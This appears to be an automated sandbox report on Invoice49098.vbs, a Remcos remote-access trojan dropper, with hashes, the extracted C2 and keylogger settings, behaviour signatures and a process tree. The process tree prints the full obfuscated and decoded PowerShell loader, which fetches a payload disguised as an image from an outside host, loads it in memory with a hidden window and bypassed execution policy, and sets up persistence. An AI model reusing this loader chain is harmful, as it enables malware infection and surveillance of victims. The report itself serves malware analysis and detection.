Analysis

  • max time kernel
    300s
  • max time network
    290s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/12/2023, 22:12

General

  • Target

    Invoice49098.vbs

  • Size

    1KB

  • MD5

    48346b598ee2dae804d9c118d1150885

  • SHA1

    d2681bcd032d501919cf07ce205e14a00a09280d

  • SHA256

    6e042637edecf20d00a889b8582e805e4d2ea12f2baf300ea952c3fd9b4f03aa

  • SHA512

    c0d8abc8a9ee7e32ab89a67dbd7abbc229afeb4fc0ce5837737bab98641fe429f8cf5ffe84c657a91d24da5949190cdc75188d00b72214ea273f6242ab4a1e65

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/689/631/original/new_image.jpg?1702461175

exe.dropper

https://uploaddeimagens.com.br/images/004/689/631/original/new_image.jpg?1702461175

Extracted

Family

remcos

Botnet

RemoteHost

C2

remco8100.duckdns.org:8100

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-G51VNO

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice49098.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDgDgTreOQDgTrevDgTreDYDgTreMwDgTrexDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDIDgTreNDgTreDgTre2DgTreDEDgTreMQDgTre3DgTreDUDgTreJwDgTre7DgTreCQDgTredwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreTgBlDgTreHcDgTreLQBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreTgBlDgTreHQDgTreLgBXDgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBVDgTreHIDgTrebDgTreDgTrepDgTreDsDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreQwBsDgTreGEDgTrecwBzDgTreEwDgTreaQBiDgTreHIDgTreYQByDgTreHkDgTreMwDgTreuDgTreEMDgTrebDgTreBhDgTreHMDgTrecwDgTrexDgTreCcDgTreKQDgTre7DgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFIDgTredQBuDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTredgB2DgTreC8DgTreZwBuDgTreC4DgTrebQBvDgTreGMDgTreLgBkDgTreGUDgTredDgTreBhDgTreHIDgTreZwBlDgTreHQDgTrebgBpDgTreGgDgTreYwBlDgTreHQDgTreYgBhDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFYDgTreYgBzDgTreE4DgTreYQBtDgTreGUDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreLDgTreDgTregDgTreCcDgTreTDgTreBuDgTreGsDgTreTgBhDgTreG0DgTreZQDgTrenDgTreCkDgTreKQDgTre=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2896
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/689/631/original/new_image.jpg?1702461175';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('txt.vv/gn.moc.detargetnihcetba//:sptth' , '' , '2' , 'VbsName' , '1' , 'C:\ProgramData\', 'LnkName'))"
        3⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4252
        • C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\VbsName.vbs
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2808
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • Suspicious use of SetWindowsHookEx
          PID:632
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:3136

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat

      Filesize

      144B

      MD5

      1879c3429e5eec4d50df34d07459a2ac

      SHA1

      ae000701d7b212ae4253bdb5c5d52398d98c42f6

      SHA256

      02ebc3314442ae5eff3f105fd1fe96dbefa527f2b89ad143fd6bac593edc0d91

      SHA512

      850bdac0592513ab30c5a1c6dc784ecc054beddb4ef6cec0944ad94937e1842dfd3a54cdb54740f74e9399a5b85f56cabd5611eee3636a95aac896f4bc4486eb

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      936B

      MD5

      5102750b3c9a40a4ece73b90d619b16c

      SHA1

      bfc351a7a125cc174415bce4922198d321d7c0dd

      SHA256

      b95feba495b3378750781ea3a1b0ffd7557c560f40d3961d8a5d855ebf7933d0

      SHA512

      b9a3ef7cc981f4e38185ef93b7176f1e79077c93d88670030d84305041dd8d3a95cdce4fc4a27453d45c5e76a220cb2a55e8f9413c106b3a36fafa8ef4956771

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      235a8eb126d835efb2e253459ab8b089

      SHA1

      293fbf68e6726a5a230c3a42624c01899e35a89f

      SHA256

      5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

      SHA512

      a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpl1dzdw.ohl.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/632-90-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-53-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-105-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-98-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-97-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-58-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-138-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-137-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-130-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-48-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-129-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-50-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-122-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-41-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-52-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-56-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-55-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-106-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-57-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-121-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-60-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-114-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-59-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-65-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-66-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-113-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-73-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-74-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-81-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-82-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/632-89-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/2808-39-0x00007FFA8A820000-0x00007FFA8B2E1000-memory.dmp

      Filesize

      10.8MB

    • memory/2808-35-0x00000249D9A40000-0x00000249D9A50000-memory.dmp

      Filesize

      64KB

    • memory/2808-33-0x00007FFA8A820000-0x00007FFA8B2E1000-memory.dmp

      Filesize

      10.8MB

    • memory/2808-34-0x00000249D9A40000-0x00000249D9A50000-memory.dmp

      Filesize

      64KB

    • memory/2896-0-0x000002C07B4A0000-0x000002C07B4C2000-memory.dmp

      Filesize

      136KB

    • memory/2896-10-0x00007FFA8A820000-0x00007FFA8B2E1000-memory.dmp

      Filesize

      10.8MB

    • memory/2896-11-0x000002C079130000-0x000002C079140000-memory.dmp

      Filesize

      64KB

    • memory/2896-49-0x00007FFA8A820000-0x00007FFA8B2E1000-memory.dmp

      Filesize

      10.8MB

    • memory/2896-12-0x000002C079130000-0x000002C079140000-memory.dmp

      Filesize

      64KB

    • memory/4252-23-0x0000018AC2C50000-0x0000018AC2C5A000-memory.dmp

      Filesize

      40KB

    • memory/4252-40-0x0000018AC2FF0000-0x0000018AC2FF8000-memory.dmp

      Filesize

      32KB

    • memory/4252-45-0x00007FFA8A820000-0x00007FFA8B2E1000-memory.dmp

      Filesize

      10.8MB

    • memory/4252-22-0x00007FFA8A820000-0x00007FFA8B2E1000-memory.dmp

      Filesize

      10.8MB